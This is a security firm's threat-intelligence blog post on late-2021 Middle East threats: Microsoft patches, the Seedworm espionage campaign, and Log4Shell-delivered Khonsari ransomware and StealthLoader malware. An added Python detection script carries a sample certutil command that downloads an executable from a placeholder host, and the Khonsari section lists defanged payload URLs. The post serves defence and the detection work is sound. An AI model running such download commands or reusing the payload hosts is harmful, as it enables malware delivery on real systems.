Top Middle East Cyber Threats – 27 December 2021

At Help AG, our Managed Security Services (MSS) team offers 24x7x365 monitoring of complex IT security infrastructures to some of the largest enterprises in the region. As a result, we have our eyes keenly fixed on the cybersecurity threat landscape and are among the first in the region to learn and act upon new threats.

In this blog, we share the top cybersecurity threats our MSS team has recently come across. So, read on to learn about what you need to look out for in the weeks ahead:

Microsoft December Patch Addresses 67 Vulnerabilities

On 15 December 2021, Microsoft issued fixes for 67 vulnerabilities across a variety of products in its monthly security release, including a fix for Windows Defender for IoT, which is vulnerable to CVE-2021-44228 and seven other remote code execution (RCE) vulnerabilities (the cloud service is not affected). The only vulnerability noted as being exploited in the wild in this month’s release is CVE-2021-43890 (CVSS score of 7.1), a Windows AppX Installer spoofing bug that may aid in social engineering attacks and has clearly been used in Emotet malware campaigns.

This round of fixes also includes CVE-2021-43883, a Windows Installer privilege escalation bug that appears to affect all supported versions of Windows.

The critical vulnerabilities addressed in December 2021 are as follows:

This month’s “Critical” rated CVEs include several RCE flaws. In addition to Windows Defender for IoT, critical RCE bugs were fixed this month in Microsoft Office, Microsoft Devices, Internet Storage Name Service (iSNS), and the WSL extension for Visual Studio Code. Given the significant risk posed by vulnerable Log4j deployments (Log4Shell), administrators should prioritize patches for any products affected by CVE-2021-44228.

RECOMMENDATIONS

Iran-Backed Espionage Campaign Targets Middle East and Asia

Seedworm, also known as MERCURY and Static Kitten, is an adversary recently observed targeting the Middle East again. In its latest campaign, which security experts have been following for the past six months, the threat actor targeted numerous organizations in Israel, Jordan, Kuwait, Laos, Pakistan, Saudi Arabia, Thailand, and the United Arab Emirates.

These attacks used legitimate tools, living-off-the-land tactics, and publicly available malware samples, but security experts believe the campaign was orchestrated by an Iranian state-sponsored threat actor. Following the initial breach, the attackers would seek to steal credentials and move laterally, focusing primarily on deploying web shells onto Exchange servers. In some cases, compromised environments were used to launch attacks on other organizations, while other victims were targeted in order to carry out supply-chain-style attacks on further targets.

In most cases, the initial infection vector is unclear, although one target appears to have been infected by a malicious MSI file delivered in an archive that was presumably attached to a spear-phishing email. Windows Script File (WSF) files were used for reconnaissance and command execution in an attack on a telecommunications services provider, and certutil was used to deploy a tunneling tool, launch WMI, and then download and run a web shell on an Exchange server. The adversary relied heavily on scripts, some of which were intended to automate data-gathering operations, but it also used a remote access tool to run a Local Security Authority Subsystem Service (LSASS) dumping tool, deliver tunneling tools, and request a URL from another compromised environment.
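The behaviours described above leave footprints in ordinary Windows process-creation telemetry. The following Python is an added illustration, not code from Help AG or from the researchers who tracked this campaign: it runs three simple detection rules over constructed process-creation events (certutil fetching or decoding content, a Windows Script Host binary running a .wsf file, and the IIS worker process that hosts Exchange's web front end spawning a command shell, which is how a web shell in use typically shows up). The field names, rule names, file paths and the files.example host are assumptions made for this example.

```python
import json
import re
from dataclasses import dataclass


# The three fields every Windows process-creation source (Sysmon Event ID 1,
# Security event 4688) provides; the key names used here are this example's own.
@dataclass
class ProcessEvent:
    image: str          # full path of the new process
    command_line: str   # its command line
    parent_image: str   # full path of the parent process


URL_RE = re.compile(r"https?://", re.IGNORECASE)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path, so odd casing or paths do not defeat a rule."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rule_certutil_download(ev: ProcessEvent):
    """certutil.exe fetching a URL or decoding a blob: the living-off-the-land use
    the advisory describes. Ordinary certificate operations do not match."""
    if basename(ev.image) != "certutil.exe":
        return None
    cl = ev.command_line.lower()
    if URL_RE.search(cl) or "-urlcache" in cl or "-decode" in cl:
        return "certutil-download-or-decode"
    return None


def rule_wsf_execution(ev: ProcessEvent):
    """A Windows Script Host binary running a .wsf file."""
    if basename(ev.image) in SCRIPT_HOSTS and ".wsf" in ev.command_line.lower():
        return "wsf-script-execution"
    return None


def rule_iis_worker_spawns_shell(ev: ProcessEvent):
    """The IIS worker process (w3wp.exe) starting a shell is the classic
    footprint of a web shell being operated."""
    if basename(ev.parent_image) == "w3wp.exe" and basename(ev.image) in SHELLS:
        return "iis-worker-spawned-shell"
    return None


RULES = (rule_certutil_download, rule_wsf_execution, rule_iis_worker_spawns_shell)


def evaluate(ev: ProcessEvent) -> list[str]:
    """Names of every rule the event triggers (empty list if none)."""
    return [name for name in (rule(ev) for rule in RULES) if name]


def evaluate_all(events_json: str) -> list[tuple[int, list[str]]]:
    """Parse a JSON array of events; return (index, rule names) for each event that triggers."""
    events = [ProcessEvent(**e) for e in json.loads(events_json)]
    hits = []
    for index, ev in enumerate(events):
        names = evaluate(ev)
        if names:
            hits.append((index, names))
    return hits


# Constructed sample events (paths are invented; files.example is a placeholder host).
SAMPLE_EVENTS = json.dumps([
    {"image": r"C:\Windows\System32\notepad.exe",
     "command_line": r"notepad.exe C:\Users\alice\notes.txt",
     "parent_image": r"C:\Windows\explorer.exe"},
    {"image": r"C:\Windows\System32\certutil.exe",
     "command_line": r"certutil.exe -urlcache -f http://files.example/t.exe C:\Users\Public\t.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe"},
    {"image": r"C:\Windows\System32\wscript.exe",
     "command_line": r"wscript.exe //B C:\Users\Public\invoice.wsf",
     "parent_image": r"C:\Windows\explorer.exe"},
    {"image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe /c whoami",
     "parent_image": r"C:\Windows\System32\inetsrv\w3wp.exe"},
    {"image": r"C:\Windows\System32\certutil.exe",
     "command_line": r"certutil.exe -verify C:\certs\server.cer",
     "parent_image": r"C:\Windows\System32\cmd.exe"},
])

if __name__ == "__main__":
    for index, names in evaluate_all(SAMPLE_EVENTS):
        print(f"event {index}: {', '.join(names)}")
```

The benign certutil event at the end is deliberate: a rule that fires on every certutil execution drowns analysts in noise, so the rule keys on what the binary was asked to do rather than on the binary alone.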

RECOMMENDATIONS

  • Make efforts to increase visibility through endpoint detection, response, and logging. Endpoint monitoring tools are critical for detecting suspicious activity in an environment after other controls have been circumvented.
  • Refer to the tips for Understanding Patches and Securing Network Infrastructure Devices from CISA.
  • Ensure that systems are correctly configured and that the security features are enabled.
  • Develop risk management and cyber hygiene practices for third parties or managed service providers (MSPs) that your organization relies on.
  • Use multi-factor authentication (MFA) for all services, especially webmail, virtual private networks, and accounts that access critical systems, to the extent possible.
  • Block the indicators of compromise (IoCs) within the respective security controls organization-wide.

Khonsari Ransomware Deployed by the Log4Shell Vulnerability

A new ransomware family named Khonsari, which targets Windows servers, has recently been discovered exploiting the Log4Shell vulnerability to deploy itself.

The exploit loads the Java bytecode at hxxp://3.145.115[.]94/Main.class via JNDI, which then downloads the Khonsari ransomware from hxxp://3.145.115[.]94/zambo/groenhuyzen.exe.

The ransomware encrypts files with AES-128 in CBC mode and appends the .khonsari extension to them.

RECOMMENDATIONS

  • Take action by blocking the indicators of compromise (IoCs).
  • Refer to the recent advisory shared by Help AG on the Log4Shell vulnerability and apply the mitigation steps.
  • Ensure that all affected systems are patched and updated to the latest version of Log4j.

StealthLoader Malware Uses Log4Shell Vulnerability

In the most recent developments involving the widely reported Log4j vulnerability, researchers discovered a Win32 executable malware known as StealthLoader. This malware is .NET-based and appeared shortly after the Log4j vulnerability was disclosed.

Using the Log4j vulnerability, the sample tracked by Check Point sends a malicious HTTP request to the vulnerable target. The malicious payload downloads a PowerShell script, which starts the malware installation process. The malicious files are hosted on a server in the United States, which distributes a variety of malicious files, including a Linux ELF coin miner and Cobalt Strike.

To avoid detection, this Trojan deploys a variety of evasion techniques while mining cryptocurrency with the victim’s resources. As part of these techniques, all relevant functions and file names are obfuscated to evade static analysis.

RECOMMENDATIONS

  • Make efforts to increase visibility through endpoint detection, response, and logging. Endpoint monitoring tools are critical for detecting suspicious activity in an environment after other controls have been circumvented.
  • Refer to the tips for Understanding Patches and Securing Network Infrastructure Devices from CISA.
  • Ensure that systems are correctly configured and that the security features are enabled.
  • Develop risk management and cyber hygiene practices for third parties or managed service providers (MSPs) that your organization relies on.
  • Use multi-factor authentication (MFA) for all services, especially webmail, virtual private networks, and accounts that access critical systems, to the extent possible.
  • Block the indicators of compromise (IoCs) within the respective security controls organization-wide.
